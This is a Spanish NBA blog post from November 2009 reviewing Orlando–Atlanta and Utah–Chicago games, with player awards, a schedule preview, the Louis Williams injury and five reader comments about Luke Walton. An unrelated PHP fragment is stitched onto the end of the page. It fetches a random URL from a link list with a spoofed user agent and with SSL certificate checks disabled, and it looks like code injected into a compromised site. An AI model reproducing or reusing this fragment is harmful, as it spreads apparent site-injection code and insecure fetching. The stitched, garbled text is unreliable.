La Crónica (26/11/2009)

27 de November de 2009 por txusma

A golpes ha bajado Orlando de la nube a Atlanta. A golpes de su principal figura, Dwight Howard, que con 22 puntos, 17 rebotes y 4 tapones se merendó al juego interior de los Hawks, que contra pívots de semejantes características sufre y mucho. Hace poco comentábamos que no era normal que Howard tirara 4 veces en un partido y Carter 18, que para que Orlando mejorara hacía faltar encontrar el equilibrio entre los 2 pesos pesados del equipo. Pues bien, Carter no ha dejado de tirar menos pero Howard se ha hecho con más balón. Resultado: han pasado por encima del, hasta ayer, líder del Este.

En el otro partido de la jornada el duelo del pasado ha tenido un resultado diferente. Sin Jordan, los Jazz han apalizado a unos Bulls que no terminan de arrancar y es que ese cambio Salmons-Gordon no está dando los resultados previstos. Cuando no era Boozer el que anotaba, era Deron. Cuando no era Deron, era Boozer y si no era Boozer podía ser Okur o Brewer o Millsap o… Boozer, que se marcó un partidazo, por si no quedaba claro.

PREMIOS

MVP: Comparten el MVP Dwight Howard (22 puntos, 17 rebotes y 3 tapones) y Carlos Boozer (28 puntos, 12 de 14 en tiros, 8 rebotes, 5 asistencias, 3 tapones). Día de jugadores interiores.

Rookie: El más destacado del día fue James Johnson, de los pocos que dio en la cara en la derrota de su equipo con 10 puntos y 5 rebotes.

Sorpresa: Anthony Johnson tiene todos los años puntas de forma inesperadas. En cuanto tiene la oportunidad suele cuajar actuaciones como la de ayer. 17 puntitos saliendo desde el banco.

Decepción: Al Horford se vio superado en todo momento y sólo fue capaz de anotar 2 puntos. Marvin Williams, a pesar del espejismo del anterior partido, sigue en un importante bache de juego. Veremos si levanta cabeza.

Esfuerzo en vano: El de Luol Deng, demasiado solo frente los Jazz. 26 puntos y 8 rebotes.

RAZONES PARA TRASNOCHAR

Esta madrugada del viernes al sábado, tan surtida en partidos como de costumbre, nos deja como plato fuerte el enfrentamiento a las 2h30 entre dos equipos de tradición ganadora que estos días sufren para mantenerse al 50%, Spurs y Rockets. La noche se abrirá a la 1h00 con el asalto de LeBron a Charlotte y un también interesante Wizards-Heat. A la 1h30, unos Raptors en busca de identidad saltarán al Garden de Boston. A las 3h30, duelo entre dos de las sorpresas agradables de la temporada, Bucks y Thunder. Y a las 4h00, Marc Gasol y los Grizzlies visitan a Rudy Fernández y los Blazers. ¿Será la noche del primer triunfo de los Nets? Sacramento no parece la pista más inexpugnable de la liga…

LA NOTICIA DEL DÍA

La lesión de Louis Williams de los Sixers. El base estaba cuajando un excepcional inicio de campaña demostrando que podía cubrir con garantías el vacio dejado por Andre Miller pero las lesiones han venido a cruzarse en su camino. Williams se rompió la mandíbula en el partido que enfrentó a su equipo a los Wizards y estará 8 semanas de baja. Oportunidad para el rookie Jrue Holiday.

VIDEO

2 partidos dan para buenas 5 jugadas, pero que jugadas. Sobretodo los 2 tapones…

Comenta

5 comentarios a esta entrada

  1. xapa_croack dice:
    #1

    El partido entre Boston y Toronto lo dara cuatro a partir de las 03.00 hora central europea.

      Citar

  2. Love Denise dice:
    #2

    No entiendo como el crack de Pete Mickeal no juega en la NBA, habiendo hoy en día tantos paquetes de “3” por los equipos. No le vendría nada mal a los Lakers en lugar del paquetorro de walton, o a los Celtics para dar buenos minutos de descanso a Allen y Pierce.

      Citar

  3. Viva_Dirk dice:
    #3

    No conozco a ningun aficionado de los Lakers que cambiase a Luke Walton por Pete. Walton conoce los sistemas y es util para Phil.

      Citar

  4. xapa_croack dice:
    #4

    calificar a paquetorro de walton es algo grave y menos yo que no soy muy amarillo, vale que no va sobrado tecnicamente, pero es de los que mas se esfuerzan de los lakers y muy peleon, que son cosas que se presuponen a los jugadores pero no todos saben hacerlo 😉 y como dice viva, sabe trasmitir perfectametne al campo lo que quiere el mister de el.

      Citar

  5. Love Denise dice:
    #5

    me parece cojonudo que os guste walton, a mi, no, no le veo ninguna cualidad por mucho peleón que sea, por ea regla de tres, Turiaf tambien sería la bomba, no?
    No olvidar el pedazo de contrato que tiene, que todavía le queda por cobrar 20 millones $ en los próximos 4 años. Si cobrase como Powell o Mbenga, así seria util.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>